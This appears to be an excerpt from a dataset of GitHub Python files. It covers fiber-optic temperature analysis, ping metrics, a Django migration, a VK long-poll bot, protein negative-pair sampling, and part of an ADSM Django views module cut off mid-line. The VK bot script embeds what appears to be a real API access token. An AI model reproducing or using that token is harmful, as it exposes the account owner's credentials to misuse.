],q.data[0,dotRng[0]:dotRng[1]])\n# dots = []\n# legends = [str(x) for x in range(len(q.data))]\n# for i in range(len(q.data)):\n# dots.append( np.dot(q.data[0,dotRng[0]:dotRng[1]], q.data[i,dotRng[0]:dotRng[1]]) / dots0 )\n# for i in range(len(dots)):\n# plt.plot(q.time[i],dots[i],'b.',label=legends[i])\n\n# #plt.legend()\n\n# plt.ylabel(\"Dimensionless Temp Detection Signal\", fontsize = 14)\n# plt.xlabel(\"Time (s)\",fontsize = 14)\n# print(dots)\n#%%\n\n\n\n\n\n#%%\nplt.figure()\nplt.plot(t,T)\nplt.xlabel('Time (s)', fontsize = 14)\nplt.ylabel('Temperature (C)', fontsize = 14)\n#%%\n\n#%%\n\n#def colorSpecPlot(specData, skip = 1, labels = None, wavelengthRng = [1548,1552]):\n# numPlots = specData.data.shape[0] // skip\n# color = cm.rainbow( np.linspace(0,1,numPlots) )\n# if labels is None:\n# labels = [None]*numPlots\n# for (spec,c,label) in zip(specData.data[:-1:skip], color, labels):\n# plt.plot( specData.waveLengths, spec.data)\n# plt.xlim([wavelengthRng[0], wavelengthRng[1]])\n\n\n\n#%%\n\n\n\n\n\n#%%\nindRng = [4200,5200]\n#%%\n#print( np.dot( q.waveLengths[ indRng[0]:indRng[1] ], -d[ indRng[0]:indRng[1] ] ) / np.sum(-d[ indRng[0]:indRng[1] ]) )\n\ncenterOfMass = []\npeakWavelength = []\nfor d in q.data[110:]:\n cm = np.dot( q.waveLengths[ indRng[0]:indRng[1] ], -d[ indRng[0]:indRng[1] ] ) / np.sum(-d[ indRng[0]:indRng[1] ])\n centerOfMass.append(cm)\n peakWavelength.append( np.argmax(d) / 100.0 + 1500.0 )\n\ncenterOfMass = np.array(centerOfMass)\npeakWavelength = np.array(peakWavelength)\n#%%\nplt.close('all')\n#%%\nplt.figure()\nplt.subplot(2,1,1)\nplt.plot(q.time[110:], q.centerOfMass[110:] )\nplt.title(\"Center of Mass\")\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Time (s)\", fontsize = 14)\nplt.tight_layout()\nplt.subplot(2,1,2)\nplt.plot(tempFunc(q.time[110:]), q.centerOfMass[110:], 'x')\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Temp (C)\", fontsize = 14)\nplt.title(\"Center of Mass\")\nplt.tight_layout()\n#%%\nplt.figure()\nplt.subplot(2,1,1)\nplt.plot(q.time[130:], q.peakWavelength[130:])\nplt.title(\"Peak Wavelength\")\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Time (s)\", fontsize = 14)\nplt.tight_layout()\nplt.subplot(2,1,2)\nplt.plot(tempFunc(q.time[130:]), q.peakWavelength[130:], 'x')\nplt.ylabel(\"Wavelength (nm)\", fontsize = 14)\nplt.xlabel(\"Temp (C)\", fontsize = 14)\nplt.title(\"Peak Wavelength\")\nplt.tight_layout()\n#%%\nlambda_coeffs = np.polyfit( tempFunc(q.time[130:]), q.peakWavelength[130:], 2)\ntempFit = np.linspace(tempFunc(q.time[130:]),10,100)\nfitLine = np.polyval( lambda_coeffs, tempFit )\n\n#plt.subplot(2,1,1)\nplt.plot(tempFit, fitLine, 'k')\nplt.title('lambda(T) = -2.13e-05 T^2 + 5.84 e-03 T + 1500 nm \\n\\n ~ 5.8 pm / K ')\n#%%%%%%%%%%%%%%%%%\n#fname = r\"C:\\Users\\dmeichle\\CFS Dropbox\\CFS_Internal\\R&D\\CSMC\\Fiberoptics\\VPI with fibers\\Spectrum collection 20201030\\Responses.20201030160612_Solderflow+cooldown.txt\"\nplt.close('all')\nq = HyperionDataset(channels=[1])\n#q.plotSpec(wavelengthRng=[1500,1600])\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\n#%%\n#cool down:\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106180508.txt\"\nq = HyperionDataset(fname, channels=[1]); q.plotSpec(wavelengthRng=[1500,1600], skip=10);\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\nplt.plot(q.peakWavelength)\n\n\n#%%\n#next was ~1-2 min idle, then turn heater on 30V @ .19A = 5.7 W\n\n\n\n\n#then turned heater off to cool back down.\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106183148.txt\"\nq = HyperionDataset(fname, channels=[1]); q.plotSpec(wavelengthRng=[1500,1600], skip=10);\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\nplt.figure()\nplt.plot(q.peakWavelength)\n#%%\nprint( q.peakWavelength[0] - q.peakWavelength[-1], (q.peakWavelength[0] - q.peakWavelength[-1]) / .0058 )\n\n#%%\n#unknown: \nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106175305.txt\"\nq = HyperionDataset(fname, channels=[1]); q.plotSpec(wavelengthRng=[1500,1600], skip=10);\ncolorTempPlot(q, lambda x: -1, wavelengthRng=[1540,1560],skip=10)\nplt.figure()\nplt.plot(q.peakWavelength)\n#(1547.15 - 1546.96)/.0058 (cooling)\n#32.75862068966458\n\n\n#%%\nplt.title(\"Detection signal vs time \\n 5.7 Watts (4 kJ net) heat applied at 77 K initial\", fontsize = 14)\nplt.tight_layout()\n#%%\nindRng = [4200,5100]\nplt.figure()\nplt.plot(q.waveLengths[4200:5100], q.data[-1, 4200:5100],color = 'b', label = '77 Kelvin')\nplt.plot(q.waveLengths[4200:5100], q.data[ 0, 4200:5100],color = 'r', label = '5.7 W after 700 s (4 kJ)')\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.title(\"Spectrum before and after heat applied\", fontsize = 14)\nplt.legend()\nplt.tight_layout()\n#%%\n\n#%%\nplt.close('all')\ndataList = []\nfor o in range(0,5):\n q = HyperionDataset(channels=[1], recentFileOffset = -o);# q.plotSpec(wavelengthRng=[1500,1600], skip=10);\n plt.figure()\n plt.plot(q.peakWavelength)\n print(q.peakWavelength[0], q.peakWavelength[-1], q.peakWavelength[0] - q.peakWavelength[-1], (q.peakWavelength[0] - q.peakWavelength[-1]) / .0058 )\n plt.title([str(a) for a in [o, q.peakWavelength[0], q.peakWavelength[-1], q.peakWavelength[0] - q.peakWavelength[-1], (q.peakWavelength[0] - q.peakWavelength[-1]) / .0058 ]] )\n dataList.append(q)\n print(str(o), q.dataFile)\n#%%:\n#ok so here is whats what: \n\n#Cool back down after heated\no=0\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106183148.txt\"\n\n\n#Unknown - maybe hanging out at 77 or with heater saturated. will check spec\no=1\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106174709.txt\"\n\n\n#Heater applied at 5.7 Watts for 700 seconds (only dataset with peak rising)\no=2\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106175305.txt\"\n\no=3\n#junk\n\n#cool from room to 77K\no=4\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106180508.txt\"\n#%%\n\ncoolDown216 = HyperionDataset(dataFileName = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106180508.txt\", channels=[1])\nheaterOn = HyperionDataset(dataFileName = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106175305.txt\", channels=[1])\ncoolAfterHeat = HyperionDataset(dataFileName = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\11\\Responses.20201106183148.txt\", channels=[1])\n#%%\ndata = [coolDown216, heaterOn, coolAfterHeat ]\ntitles = ['Cool from 293K to 77K', 'Heater on 5.7 W for 700 s', 'Heater Off Cooling back to 77 K']\n#%%\nplt.close('all)')\n#%%\nfor (q,theTitle) in zip(data, titles):\n plt.figure()\n #plt.plot(q.time, q.peakWavelength)\n plt.subplot(2,1,1)\n plt.plot( q.time, q.peakWavelength)\n plt.xlabel(\"Time (s)\", fontsize = 14)\n plt.ylabel(\"Peak Wavelength\", fontsize = 14)\n diagStr = 'Initial {:3.2f} nm Final {:3.2f} nm Change {:3.2f} nm'.format( q.peakWavelength[0], q.peakWavelength[-1], -( q.peakWavelength[0] - q.peakWavelength[-1] ) )\n plt.title(theTitle + '\\n' + diagStr)\n plt.grid()\n plt.tight_layout()\n\n plt.subplot(2,1,2)\n plt.plot(q.waveLengths, q.data[0, :], label = 'Initial')\n plt.plot(q.waveLengths, q.data[-1, :], label = 'Final')\n plt.xlabel('Wavelength (nm)', fontsize = 14)\n plt.ylabel('Reflected Power (dB)', fontsize = 14)\n plt.xlim([1542, 1551])\n plt.title(theTitle + '\\n' + diagStr)\n plt.grid()\n plt.tight_layout()\n#%%\n\ncolorTempPlot(data[1], lambda x:-1, skip = 25)\nplt.title(\"Heater On\")\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.grid()\n\n#%%\n\n\ncolorTempPlot(data[0], lambda x:-1, skip = 10)\nplt.title(\"Cool from 293 K to 77 K\")\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.grid()\n#%%\n\n\ncolorTempPlot(data[2], lambda x:-1, skip = 10)\nplt.title(\"Heater Off\")\nplt.xlabel('Wavelength (nm)', fontsize = 14)\nplt.ylabel('Reflected Power (dB)', fontsize = 14)\nplt.grid()\n#%%\n#make covariance matrix:\nd = q.data[1:-2,4000:5750]\n\nd -= np.min(d); d /= np.max(d)\nfor l in d:\n plt.plot(l)\n#%%\nc = np.cov( d )\n#%%\ndata = [coolDown216, heaterOn, coolAfterHeat ]\n\nfor (q, theTitle) in zip(data, titles):\n d = q.data[:,4250:5650]\n d -= np.min(d); d /= np.max(d)\n c = np.cov( d ,rowvar = False )\n plt.figure()\n plt.imshow(c)\n plt.title(theTitle)\n plt.figure()\n plt.title(theTitle)\n q.colorTempPlot(skip=25)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dpm314/Quench_FBG","sub_path":"Hyperion77Kworkspace.py","file_name":"Hyperion77Kworkspace.py","file_ext":"py","file_size_in_byte":10575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21557876895","text":"\"\"\"\nJack McCarthy\n01/06/2021\nSimple Packet Analyzer: Ping Metrics\nDescription: Takes the parsed lists as an argument and returns metrics to both the terminal and output.csv\n\"\"\"\n\ndef compute(compute_list):\n nodeIPs = ['192.168.100.1','192.168.100.2','192.168.200.1','192.168.200.2']\n print(len(compute_list))\n for x in range(len(compute_list)):\n all_data= compute_list[x]\n IP = nodeIPs[x]\n reqSent = 0\n reqRecv = 0\n repSent = 0\n repRecv = 0\n totalReqSentFrameSize = 0\n totalReqRecvFrameSize = 0\n totalReqSentData = 0\n totalReqRecvData = 0\n RTTtemp = -1\n totalRTT = 0\n delayTemp = -1\n totalDelay = 0\n hopTemp = -1\n totalHop = 0\n\n# 0/7=No. 1/8=time 2=source address 3=destination address 4=length(frame) 5(ping/request)\n# 6=sequence number 7=ttl\n\n for data in all_data:\n \n if data[2] == IP: # Sent Frames\n \n if data[5] == \"request\": # Sent request Frames\n reqSent += 1\n totalReqSentFrameSize += int(data[4])\n totalReqSentData += int(data[4]) - 42\n hopTemp = data[7]\n RTTtemp = float(data[1])\n\n elif data[5] == \"reply\": # Sent reply Frames\n repSent += 1\n if delayTemp != -1:\n totalDelay += float(data[1]) - delayTemp\n delayTemp = -1\n elif data[3] == IP: # Recv Frames\n if data[5] == \"request\": # Recv request Frames\n reqRecv += 1\n totalReqRecvFrameSize += int(data[4])\n totalReqRecvData += int(data[4]) - 42\n delayTemp = float(data[1])\n elif data[5] == \"reply\": # Recv reply Frames\n repRecv += 1\n if RTTtemp != -1:\n totalRTT += float(data[1]) - RTTtemp\n RTTtemp = -1\n if hopTemp != -1:\n totalHop += hopTemp - int(data[7]) + 1\n hopTemp = -1\n avgRTT = totalRTT / repRecv * 1000\n throughput = totalReqSentFrameSize / totalRTT /1000\n goodput = totalReqSentData / totalRTT / 1000\n avgDelay = totalDelay / repSent * 1000000\n avgHop = totalHop / repRecv\n nodeVal=x+1\n\n#Creates a CSV of metrics\n output = open(\"output.csv\", \"a\")\n output.write(\"Node \" + str(nodeVal))\n output.write('\\n\\n')\n output.write(\"Echo Requests Sent,Echo Request Received,Echo Replies Sent,Echo Replies Received,\\n\")\n output.write(str(reqSent)+\",\"+str(reqRecv)+\",\"+str(repSent)+\",\"+str(repRecv)+\"\\n\")\n output.write(\"Echo Request Bytes Sent (bytes),Echo Request Data Sent (bytes)\\n\")\n output.write(str(totalReqSentFrameSize)+\",\"+str(totalReqSentData)+\"\\n\")\n output.write(\"Echo Request Bytes Received (bytes),Echo Request Data Received (bytes)\\n\")\n output.write(str(totalReqRecvFrameSize)+\",\"+str(totalReqRecvData)+\"\\n\")\n output.write('\\n')\n output.write(\"Average RTT (milliseconds),\"+str(round(avgRTT,2))+\"\\n\")\n output.write(\"Echo Request Throughput (kB/sec),\"+str(round(throughput,1))+\"\\n\")\n output.write(\"Echo Request Goodput (kB/sec),\"+str(round(goodput,1))+\"\\n\")\n output.write(\"Average Reply Delay (microseconds),\"+str(round(avgDelay, 2))+\"\\n\")\n output.write(\"Average Echo Request Hop Count,\"+str(round(avgHop, 2))+\"\\n\")\n output.write('\\n')\n\n#Returns metrics to terminal window.\n print(\"Node \" + str(nodeVal) +\" Results:\")\n print()\n print(\"Echo Requests Sent: \" + str(reqSent))\n print(\"Echo Requests Received: \" + str(reqRecv))\n print(\"Echo Reply Sent: \" + str(repSent))\n print(\"Echo Reply Received: \" + str(repRecv))\n print(\"Echo Request Bytes Sent: \" + str(totalReqSentFrameSize))\n print(\"Echo Request Bytes Received: \" + str(totalReqRecvFrameSize))\n print(\"Echo Request Data Sent: \" + str(totalReqSentData))\n print(\"Echo Request Data Received: \" + str(totalReqRecvData))\n print(\"Average RTT (ms): \" + str(round(avgRTT,2)))\n print(\"Echo Request Throughput (kB/sec): \" + str(round(throughput,1)))\n print(\"Echo Request Goodput (kB/sec): \" + str(round(goodput,1)))\n print(\"Average Reply Delay (us): \" + str(round(avgDelay, 2)))\n print(\"Average Echo Request Hop Count: \" + str(round(avgHop, 2)))\n print()\n\n","repo_name":"raistlindt/Simple-Packet-Analyzer-Ping-Metrics","sub_path":"compute_metrics.py","file_name":"compute_metrics.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27970597407","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='City',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100, null=True, blank=True)),\n ('county', models.CharField(max_length=100, null=True, blank=True)),\n ('latitude', models.FloatField(null=True, blank=True)),\n ('longitude', models.FloatField(null=True, blank=True)),\n ],\n options={\n 'verbose_name_plural': 'cities',\n },\n ),\n migrations.CreateModel(\n name='State',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, null=True)),\n ('abbrev', models.CharField(max_length=2, null=True, blank=True)),\n ('pop', models.IntegerField(null=True, blank=True)),\n ('state_map', models.ImageField(null=True, upload_to=b'state_map', blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='StateCapital',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, null=True, blank=True)),\n ('lat', models.FloatField(null=True, blank=True)),\n ('lon', models.FloatField(null=True, blank=True)),\n ('pop', models.IntegerField(null=True, blank=True)),\n ('state', models.OneToOneField(null=True, to='main.State')),\n ],\n options={\n 'verbose_name_plural': 'State Capitals',\n },\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('phone_number', models.CharField(max_length=255, null=True, blank=True)),\n ('user', models.OneToOneField(null=True, blank=True, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='city',\n name='state',\n field=models.ForeignKey(blank=True, to='main.State', null=True),\n ),\n ]\n","repo_name":"swheatley/first_django","sub_path":"main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31064710731","text":"import requests\n\ngetServer = 'https://api.vk.com/method/groups.getLongPollServer?group_id=166256214&v=5.50&access_token=ba777fbd7831e6fc3da8613dd838e2d14b76d8352e5f4aaf1693ccde23c1ee2f347f35d8a33d8291c701d'\n\nresponse = requests.get(getServer)\n\nkey = response.json()['response']['key']\n\n\n##\nurl = 'https://lp.vk.com/wh166256214?act=a_check&key=' + key + '&ts=1&wait=25'\n\nresponse = requests.get(url)\n\nfor update in response.json()['updates']: # Проверка каждого элемента списка\n\tprint(update['object']['body'])","repo_name":"dmProgr/abra1","sub_path":"bot1_VkAPI.py","file_name":"bot1_VkAPI.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73451269652","text":"#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~get neg pairs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nimport random\n\ndef get_protein_list(path):\n res = []\n with open(path) as f:\n for line in f:\n if line.startswith(\">\"):\n tem = line.strip()[1:]\n res.append(tem)\n return res\n\ndef neg_homologous(portein_A: str, protein_B: str, pos_filter: str,rd = 123) -> str:\n hsa_gene = get_protein_list(portein_A)\n mmu_gene = get_protein_list(protein_B)\n\n random.seed(rd)\n\n pos_pair = set()\n\n with open(pos_filter) as f:\n for line in f:\n tem = line.strip().split(\"\\t\")\n pos_pair.add(tem[1]+\"\\t\"+tem[2])\n\n # with open(\"/home/yangfang/Sash/QFO/QfO_release_2018_04/othFinder_9606_272561.txt\") as f:\n # for line in f:\n # tem = line.strip().split(\"\\t\")\n # pos_pair.add(tem[1] + \"\\t\" + tem[2])\n\n\n\n def get_random():\n a = random.choice(hsa_gene)\n m = random.choice(mmu_gene)\n pair1 = a + \"\\t\" + m\n pair2 = m + \"\\t\" + a\n return pair1,pair2\n w_name = pos_filter.split(\".\")[0] + \"-neg\" + \".txt\"\n w_path = open(w_name,\"w\")\n set_res = set()\n while(len(set_res) != len(pos_pair)*10):\n # print(len(set_res))\n pair1, pair2 = get_random()\n # if pair1 not in pos_pair and pair2 not in pos_pair:\n # if pair1 not in set_res and pair2 not in set_res:\n # set_res.add(pair1)\n if pair1 not in pos_pair:\n if pair1 not in set_res:\n set_res.add(pair1)\n for line in set_res:\n w_path.write(\"0\" + \"\\t\" + line +\"\\n\")\n w_path.close()\n return w_name\n\nif __name__ == '__main__':\n protein_a =\"\"\n protein_b =\"\"\n pos_filter =\"\"\n rd = 123\n neg_homologous(portein_A= protein_a,\n protein_B= protein_b,\n pos_filter= pos_filter,\n rd=rd)","repo_name":"yangfangs/OrthoSash","sub_path":"prepare_ncbi_homolog_neg_pair.py","file_name":"prepare_ncbi_homolog_neg_pair.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16299279349","text":"import csv\nimport subprocess\nimport itertools\nimport platform\n\nfrom collections import OrderedDict\n\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.forms.models import modelformset_factory\nfrom django.db.models import Q, ObjectDoesNotExist\nfrom django.db import OperationalError, transaction\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom Results.models import * # This is absolutely necessary for dynamic form loading\nfrom ScenarioCreator.models import * # This is absolutely necessary for dynamic form loading\nfrom ScenarioCreator.forms import * # This is absolutely necessary for dynamic form loading\nfrom ADSMSettings.models import unsaved_changes\nfrom ADSMSettings.utils import graceful_startup, file_list, handle_file_upload, workspace_path, adsm_executable_command\nfrom ScenarioCreator.population_parser import lowercase_header\nfrom ScenarioCreator.utils import convert_user_notes_to_unit_id\nfrom ScenarioCreator.models import VaccinationRingRule, RelationalFunction, ProbabilityDensityFunction\nfrom ScenarioCreator.exporter import *\nfrom ScenarioCreator.importer import *\nfrom ScenarioCreator import function_graphs\nfrom matplotlib import pyplot as plt\n\n\n# Useful descriptions of some of the model relations that affect how they are displayed in the views\nfrom ScenarioCreator.utils import whole_scenario_validation\n\nsingletons = ['Scenario', 'Population', 'Disease', 'VaccinationGlobal', 'OutputSettings', \"DestructionGlobal\", \"ControlMasterPlan\"]\nabstract_models = {\n 'Function':\n [('RelationalFunction', RelationalFunction),\n ('ProbabilityDensityFunction', ProbabilityDensityFunction)],\n 'DiseaseSpread':\n [('DirectSpread', DirectSpread),\n ('IndirectSpread', IndirectSpread),\n ('AirborneSpread', AirborneSpread)],\n}\n\nspread_types = {'DirectSpread': (DirectSpread, 'direct_contact_spread'),\n 'IndirectSpread': (IndirectSpread, 'indirect_contact_spread'),\n 'AirborneSpread': (AirborneSpread, 'airborne_spread')}\n\ndef spaces_for_camel_case(text):\n return re.sub(r'([a-z])([A-Z])', r'\\1 \\2', text)\n\n\ndef add_breadcrumb_context(context, model_name, primary_key=None):\n context['pretty_name'] = spaces_for_camel_case(promote_to_abstract_parent(model_name))\n if model_name not in singletons:\n context['model_link'] = '/setup/' + model_name + '/'\n if primary_key is not None:\n context['model_link'] += primary_key + '/'\n else: # for singletons, don't list the specific name, just the type\n context['title'] = 'Edit the ' + spaces_for_camel_case(model_name)\n\n\ndef population_panel_only(request):\n \"\"\"#707 Fix by loading the production group section dynamically\n When creating new Production Type Groups, the population panel needs to be loaded asynchronously, but\n the contents depends on the context processor, which is normally only run on non-ajax requests. This function\n collects the context in Ajax calls\"\"\"\n context = {'ProductionGroups': ProductionGroup.objects.all()}\n return render(request, 'population_panel.html', context)\n\n\ndef production_type_list_json(request):\n msg = list(ProductionType.objects.values_list('name', 'id'))\n return JsonResponse(msg, safe=False) # necessary to serialize a list object\n\n\ndef jsonify(string_list):\n \"\"\"Returns the name of the specific assignment or None\"\"\"\n if string_list:\n return string_list[0]\n else:\n return None\n\n\ndef population_panel_status_json(request):\n response = []\n\n for pt in ProductionType.objects.all():\n response.append({'name': pt.name,\n 'pk': pt.id,\n 'unit_count': Unit.objects.filter(production_type=pt).count(),\n 'spread': DiseaseSpreadAssignment.objects.filter(destination_production_type=pt).filter(\n Q(direct_contact_spread__isnull=False,) |\n Q(indirect_contact_spread__isnull=False) |\n Q(airborne_spread__isnull=False)).count(),\n 'control': jsonify(ProtocolAssignment.objects.filter(control_protocol__isnull=False, production_type=pt).values_list('control_protocol__name', flat=True)),\n 'progression': jsonify(DiseaseProgressionAssignment.objects.filter(progression__isnull=False, production_type=pt).values_list('progression__name', flat=True)),\n 'zone': jsonify(ZoneEffectAssignment.objects.filter(effect__isnull=False, production_type=pt).values_list('zone__name', flat=True)),\n })\n\n return JsonResponse(response, safe=False)\n\n\ndef spread_options_json(request): # list of DiseaseSpreads by Type\n options = {\n 'DirectSpread': {d.id: {'name': d.name, 'pk': d.id} for d in DirectSpread.objects.all()},\n 'IndirectSpread': {d.id: {'name': d.name, 'pk': d.id} for d in IndirectSpread.objects.all()},\n 'AirborneSpread': {d.id: {'name': d.name, 'pk': d.id} for d in AirborneSpread.objects.all()}\n }\n return JsonResponse(options)\n\n\ndef spread_inputs_json(request):\n options = {}\n for class_name, meta in spread_types.items():\n model, field_name = meta\n options[class_name] = {}\n for spread in model.objects.all():\n inputs = []\n for source in ProductionType.objects.all():\n query = DiseaseSpreadAssignment.objects.filter(**{'source_production_type': source, field_name: spread})\n if query.exists():\n one_source = {'source': source.id,\n 'destinations': [pair.destination_production_type.id for pair in query]}\n inputs.append(one_source)\n\n options[class_name][spread.id] = inputs\n return JsonResponse(options)\n\n\ndef modify_spread_assignments(request):\n \"\"\"\n called when a request to change the spread assignements is made. This function is called for all three spread assignment types\n :param request:\n :return: json summary of the request\n \"\"\"\n # destinations is a list of integer ids\n destinations = [int(x) for x in request.POST.getlist('destinations[]')]\n # if a non-blank selection was made\n if 'destinations[]' in request.POST.keys() and request.POST['source']: # when a user selects ----- there's no PK at all\n data = request.POST.dict()\n # if a spread assignment is being CREATED\n if 'POST' == data['action']:\n # for each destination\n for destination_pk in destinations:\n assignment = DiseaseSpreadAssignment.objects.filter(**{'source_production_type_id': int(data['source']),\n 'destination_production_type_id': int(destination_pk)})\n parameter_class, field = spread_types[data['spread_type']]\n assignment.update(**{field: parameter_class.objects.get(id=int(data['pk']))}) # saves immediately\n # Debug output:\n source = ProductionType.objects.get(id= int(data['source'])).name\n destination = ProductionType.objects.get(id=int(destination_pk)).name\n print(\"ADD\", field, \"SOURCE:\", source, \"DESTINATION:\", destination)\n\n # if a spread assignment is being DELETED\n if 'DELETE' == data['action']: # Django doesn't allow you to parametrize DELETE http_method\n # for each destination\n for destination_pk in destinations:\n assignment = DiseaseSpreadAssignment.objects.filter(**{'source_production_type_id': int(data['source']),\n 'destination_production_type_id': int(destination_pk)})\n parameter_class, field = spread_types[data['spread_type']]\n assignment.update(**{field: None}) # saves immediately\n # Debug output:\n source = ProductionType.objects.get(id= int(data['source'])).name\n destination = ProductionType.objects.get(id=int(destination_pk)).name\n print(\"DEL\", field, \"SOURCE:\", source, \"DESTINATION:\", destination)\n\n return spread_inputs_json(request)\n\n\ndef disease_spread_assignments_json(request):\n source_rows = {}\n for source in ProductionType.objects.all().order_by('name'):\n one_row = {'name': source.name, 'pk': source.id, 'destinations': {}}\n for destination in ProductionType.objects.all().order_by('name'):\n assignment = {'name': destination.name, 'pk': destination.id, 'DirectSpread': None, 'IndirectSpread': None,\n 'AirborneSpread': None}\n query = DiseaseSpreadAssignment.objects.filter(source_production_type=source,\n destination_production_type=destination)\n if query.exists():\n assignment['DirectSpread'] = query.first().direct_contact_spread_id\n assignment['IndirectSpread'] = query.first().indirect_contact_spread_id\n assignment['AirborneSpread'] = query.first().airborne_spread_id\n one_row['destinations'][destination.name] = assignment\n source_rows[source.name] = one_row\n return JsonResponse(source_rows, safe=False)\n\n\ndef disable_all_controls_json(request):\n if 'POST' in request.method:\n new_value = request.POST['use_controls']\n set_to = new_value == 'false' # logical inversion because of use_controls vs disable_controls\n controls = VaccinationGlobal.objects.get()\n controls.disable_all_controls = set_to\n controls.save()\n return JsonResponse({'status': 'success'})\n else:\n return JsonResponse({'disable_all_controls': VaccinationGlobal.objects.get().disable_all_controls})\n \n\ndef initialize_spread_assignments():\n pts = list(ProductionType.objects.all())\n for source in pts:\n for destination in pts:\n DiseaseSpreadAssignment.objects.get_or_create(\n source_production_type=source,\n destination_production_type=destination)\n \n\ndef assign_disease_spread(request):\n initialize_spread_assignments()\n\n context = {'base_page': 'ScenarioCreator/AssignSpread.html'}\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n\n\ndef zone_effects(request):\n ZoneEffectAssignment.objects.ensure_all_zones_and_production_types()\n assignment_form_set = modelformset_factory(ZoneEffectAssignment, form=ZoneEffectAssignmentForm, extra=0)\n\n context = {'title': 'What Effect does a Zone have on each Production Type?'}\n if save_formset_succeeded(assignment_form_set, ZoneEffectAssignment, context, request):\n return redirect(request.path)\n else:\n forms = assignment_form_set(queryset=ZoneEffectAssignment.objects.all())\n forms_sorted_by_pt = sorted(forms, key=lambda x: x.instance.production_type.name)\n forms_grouped_by_pt = itertools.groupby(forms_sorted_by_pt, lambda x: x.instance.production_type)\n\n context['formset'] = assignment_form_set\n context['formset_headings'] = Zone.objects.order_by('id')\n context['formset_grouped'] = {k: sorted(v, key=lambda x: x.instance.zone.id) \n for k,v in forms_grouped_by_pt}\n context['base_page'] = 'ScenarioCreator/FormSet2D.html'\n\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n\n\ndef save_formset_succeeded(MyFormSet, TargetModel, context, request):\n try:\n initialized_formset = MyFormSet(request.POST, request.FILES, queryset=TargetModel.objects.all())\n if initialized_formset.is_valid():\n instances = initialized_formset.save()\n context['formset'] = initialized_formset\n return True\n return False\n except ValidationError:\n return False\n\n\ndef populate_forms_matching_ProductionType(MyFormSet, TargetModel, context, missing, request, template='ScenarioCreator/3Panels.html',\n html='ScenarioCreator/AssignmentList.html'):\n \"\"\"FormSet is pre-populated with existing assignments and it detects and fills in missing\n assignments with a blank form with production type filled in.\"\"\"\n if save_formset_succeeded(MyFormSet, TargetModel, context, request):\n return redirect(request.path)\n else:\n forms = MyFormSet(queryset=TargetModel.objects.all())\n for index, pt in enumerate(missing):\n index += TargetModel.objects.count()\n forms[index].fields['production_type'].initial = pt.id\n context['formset'] = forms\n context['base_page'] = html\n return render(request, template, context)\n\n\ndef assign_protocols(request):\n missing = 